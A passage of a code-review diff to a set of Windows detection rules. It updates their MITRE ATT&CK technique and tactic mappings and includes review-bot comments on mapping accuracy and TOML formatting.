"https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_script_via_html_app.toml b/rules/windows/defense_evasion_script_via_html_app.toml index 79779d38a9d..b170725e2ac 100644 --- a/rules/windows/defense_evasion_script_via_html_app.toml +++ b/rules/windows/defense_evasion_script_via_html_app.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/09" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] @@ -121,10 +121,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" @@ -135,10 +137,30 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml index 18215c26fe3..c4916cbff20 100644 --- a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,6 +99,7 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -108,32 +109,44 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml index d31877d1658..9698c3f6a7a 100644 --- a/rules/windows/defense_evasion_suspicious_certutil_commands.toml +++ b/rules/windows/defense_evasion_suspicious_certutil_commands.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -140,14 +140,44 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml index cf9205c5fcc..9a072d913eb 100644 --- a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml +++ b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -86,15 +86,32 @@ process where host.os.type == "windows" and event.type == "start" and process.ex [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" @@ -105,18 +122,24 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -127,10 +150,17 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.003" +name = "Malicious Image" +reference = "https://attack.mitre.org/techniques/T1204/003/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml index 30a19f5a7ff..601825fa93b 100644 --- a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml +++ b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
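Review bot: The added sub-technique `T1204.003 Malicious Image` in defense_evasion_suspicious_execution_from_mounted_device.toml does not describe what this rule detects: in ATT&CK that sub-technique covers backdoored cloud VM and container images (AMIs, Docker images and the like), not executables launched from a mounted ISO/VHD/disk image, so the rule would be attributed to an unrelated technique in coverage views. The user-execution sub-technique that matches running a file out of a mounted container is `id = "T1204.002"`, `name = "Malicious File"`, `reference = "https://attack.mitre.org/techniques/T1204/002/"`; if the intent is the container-format evasion aspect instead, `T1553.005 Mark-of-the-Web Bypass` under the existing Defense Evasion entry is the usual mapping and would belong in the preceding hunk of this file. Separately, the new `T1204` technique table and its sub-technique table are emitted back-to-back with no blank line between them, while the rest of this change separates technique and sub-technique tables with one blank line (compare the `T1059` block in the preceding hunk of this file); the same back-to-back layout appears for `T1553`/`T1553.006` in defense_evasion_untrusted_driver_loaded.toml, so both files look hand-edited rather than passed through the same formatter as the others.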
@@ -95,14 +95,46 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml b/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml index d6f9837abe0..82c550c5890 100644 --- a/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml +++ b/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/24" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,14 +83,18 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_suspicious_scrobj_load.toml b/rules/windows/defense_evasion_suspicious_scrobj_load.toml index 8b30df05e2c..e931dae2d5f 100644 --- a/rules/windows/defense_evasion_suspicious_scrobj_load.toml +++ b/rules/windows/defense_evasion_suspicious_scrobj_load.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,19 +94,31 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" reference = "https://attack.mitre.org/techniques/T1218/010/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_suspicious_wmi_script.toml b/rules/windows/defense_evasion_suspicious_wmi_script.toml index 45706563ed1..3e0c53a79a2 100644 
--- a/rules/windows/defense_evasion_suspicious_wmi_script.toml +++ b/rules/windows/defense_evasion_suspicious_wmi_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,26 +83,31 @@ sequence by process.entity_id with maxspan = 2m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml index 2b461a36b16..611a28342ca 100644 --- a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml +++ b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -131,6 +131,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" 
@@ -141,21 +142,35 @@ id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml index 5c5acb3734e..2126ccfcd1d 100644 --- a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml +++ b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -136,26 +136,39 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1211" name = "Exploitation for Defense Evasion" reference = "https://attack.mitre.org/techniques/T1211/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/defense_evasion_untrusted_driver_loaded.toml b/rules/windows/defense_evasion_untrusted_driver_loaded.toml index c9a0df30ca0..9746c1f2d3b 100644 --- a/rules/windows/defense_evasion_untrusted_driver_loaded.toml +++ b/rules/windows/defense_evasion_untrusted_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/04" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -119,19 +119,28 @@ driver where host.os.type == "windows" and process.pid == 4 and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.006" +name = "Code Signing Policy Modification" +reference = "https://attack.mitre.org/techniques/T1553/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml index ef3d4c6c627..51aaa7fc900 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
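Review bot: The added `[[rule.threat.technique]]` for T1553 in defense_evasion_untrusted_driver_loaded.toml is appended directly after the T1036.001 `reference` line with no separating blank line, whereas the rest of this patch (the T1059 block in the first hunk on this page, the T1068 block in defense_evasion_system_critical_proc_abnormal_file_activity.toml) inserts a `+` blank line between tables. The same missing separator precedes the new technique or sub-technique tables in defense_evasion_unusual_process_network_connection.toml, defense_evasion_wdac_policy_by_unusual_process.toml, defense_evasion_workfolders_control_execution.toml, defense_evasion_wsl_enabled_via_dism.toml, discovery_active_directory_webservice.toml, discovery_command_system_account.toml, discovery_high_number_ad_properties.toml, discovery_host_public_ip_address_lookup.toml, discovery_whoami_command_activity.toml, execution_command_prompt_connecting_to_the_internet.toml and execution_command_shell_started_by_svchost.toml. If these files are re-serialized by the project's rule formatter before merge the spacing will normalize itself; otherwise add the blank line before each new `[[rule.threat.technique]]` so later diffs stay minimal.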
@@ -88,14 +88,26 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/defense_evasion_unusual_process_network_connection.toml b/rules/windows/defense_evasion_unusual_process_network_connection.toml index 8dd19e5c315..4b7683de54e 100644 --- a/rules/windows/defense_evasion_unusual_process_network_connection.toml +++ b/rules/windows/defense_evasion_unusual_process_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -95,14 +95,38 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique.subtechnique]] +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.003" +name = "JamPlus" +reference = "https://attack.mitre.org/techniques/T1127/003/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml index 236dce5f9bd..2d1d79edb6c 100644 --- a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml +++ b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -91,14 +91,18 @@ file where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_windows_filtering_platform.toml b/rules/windows/defense_evasion_windows_filtering_platform.toml index 2b3015a7db9..2bf6e1fcd18 100644 --- a/rules/windows/defense_evasion_windows_filtering_platform.toml +++ b/rules/windows/defense_evasion_windows_filtering_platform.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -136,19 +136,23 @@ sequence by winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [[rule.threat.technique.subtechnique]] id = "T1562.004" name = "Disable or Modify System Firewall" reference = "https://attack.mitre.org/techniques/T1562/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_workfolders_control_execution.toml b/rules/windows/defense_evasion_workfolders_control_execution.toml index dd3fab8da24..61fdcc336fe 100644 --- a/rules/windows/defense_evasion_workfolders_control_execution.toml 
+++ b/rules/windows/defense_evasion_workfolders_control_execution.toml @@ -2,7 +2,7 @@ creation_date = "2022/03/02" integration = ["windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -95,14 +95,33 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.008" +name = "Path Interception by Search Order Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml index f0dae674a7e..42ba25c6386 100644 --- a/rules/windows/defense_evasion_wsl_bash_exec.toml +++ b/rules/windows/defense_evasion_wsl_bash_exec.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -103,31 +103,49 @@ process where host.os.type == "windows" and event.type : "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/windows/defense_evasion_wsl_child_process.toml b/rules/windows/defense_evasion_wsl_child_process.toml index 54afa15164c..96f71cd4e3f 100644 --- a/rules/windows/defense_evasion_wsl_child_process.toml +++ b/rules/windows/defense_evasion_wsl_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
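Review bot: The new third `[[rule.threat]]` block in defense_evasion_wsl_bash_exec.toml maps the rule to `Credential Access` via T1003.008, but nothing in the hunk shows which part of the detection logic supports that tactic; the query and description sit outside the hunk. A tactic mapping the query does not actually cover inflates apparent ATT&CK coverage and may point analysts at a rule that will not fire on that behaviour, so the PR description should name the matched command patterns that justify it. The same question applies to the broad Discovery expansion in discovery_posh_suspicious_api_functions.toml, where T1016, T1033, T1082, T1201 and two new sub-techniques are attached to a single rule.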
@@ -119,14 +119,31 @@ process where host.os.type == "windows" and event.type : "start" and process.com [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml index 3fbc2682614..9d48751dc63 100644 --- a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml +++ b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,14 +91,18 @@ process where host.os.type == "windows" and event.type : "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = 